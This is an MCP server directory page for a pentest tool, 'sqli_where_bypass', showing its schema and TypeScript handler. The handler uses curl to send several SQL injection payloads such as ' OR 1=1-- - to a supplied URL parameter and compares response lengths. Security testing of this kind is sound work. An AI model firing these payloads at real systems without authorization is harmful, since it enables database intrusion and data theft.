Skip to main content
Glama
operantlabs

operant-mcp

Official
by operantlabs
OverviewSchemaRelated ServersScoreDiscussions
TypeScript
Local

sqli_where_bypass

Test SQL injection vulnerabilities by bypassing WHERE clauses with OR 1=1 payload variants. Compares response lengths to identify potential injection points in web applications.

Instructions

Test WHERE clause bypass via OR 1=1 variants. Sends multiple payloads (OR 1=1--, OR '1'='1, OR 1=1/*, etc.) against the target parameter and compares response lengths to the baseline. Returns baseline_length and results array. Side effects: None (read-only GET requests). Sends 7 requests total.

Input Schema

TableJSON Schema
NameRequiredDescriptionDefault
urlYesFull URL with query parameter, e.g. https://target/filter?category=Gifts
parameterYesVulnerable query parameter name, e.g. 'category'
valueYesLegitimate parameter value to base the injection on, e.g. 'Gifts'

Implementation Reference

  • src/tools/sqli.ts:20-68 (handler)
    The handler logic for 'sqli_where_bypass'. It constructs various SQLi payloads designed for WHERE clause bypasses, sends them using 'curl', compares the response lengths against a baseline, and returns the results.
      async ({ url, parameter, value }) => {
    requireTool("curl");

    const payloads = [
      `' OR 1=1-- -`,
      `' OR 1=1--`,
      `' OR '1'='1`,
      `' OR 1=1/*`,
      `' OR 1=1 LIMIT 1-- -`,
      `" OR ""="`,
    ];

    // Baseline request
    const baseUrl = url.split("?")[0];
    const baselineRes = await runCmd("curl", [
      "-sk", "-o", "/dev/null", "-w", "%{http_code}:%{size_download}",
      `${baseUrl}?${parameter}=${value}`,
    ]);
    const baselineParts = baselineRes.stdout.split(":");
    const baselineStatus = baselineParts.length === 2 ? parseInt(baselineParts[0], 10) : 0;
    const baselineLength = baselineParts.length === 2 ? parseInt(baselineParts[1], 10) : 0;

    const results = [];
    for (const payload of payloads) {
      const injected = `${value}${payload}`;
      const res = await runCmd("curl", [
        "-sk", "-o", "/dev/null", "-w", "%{http_code}:%{size_download}",
        `${baseUrl}?${parameter}=${injected}`,
      ]);
      const p = res.stdout.split(":");
      const status = p.length === 2 ? parseInt(p[0], 10) : 0;
      const length = p.length === 2 ? parseInt(p[1], 10) : 0;
      results.push({
        payload: injected,
        status,
        length,
        delta: length - baselineLength,
      });
    }

    const result = {
      baseline_status: baselineStatus,
      baseline_length: baselineLength,
      results,
      hint: "Positive delta suggests more data returned — potential bypass.",
    };
    return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] };
  }
);
  • src/tools/sqli.ts:15-19 (schema)
    Input schema for 'sqli_where_bypass' using Zod for validation.
    {
  url: z.string().describe("Full URL with query parameter, e.g. https://target/filter?category=Gifts"),
  parameter: z.string().describe("Vulnerable query parameter name, e.g. 'category'"),
  value: z.string().describe("Legitimate parameter value to base the injection on, e.g. 'Gifts'"),
},
  • src/tools/sqli.ts:12-14 (registration)
    Registration of the 'sqli_where_bypass' tool in the McpServer.
    server.tool(
  "sqli_where_bypass",
  "Test WHERE clause bypass via OR 1=1 variants. Sends multiple payloads (OR 1=1--, OR '1'='1, OR 1=1/*, etc.) against the target parameter and compares response lengths to the baseline. Returns baseline_length and results array. Side effects: None (read-only GET requests). Sends 7 requests total.",
Install Server

Other Tools

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/operantlabs/operant-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server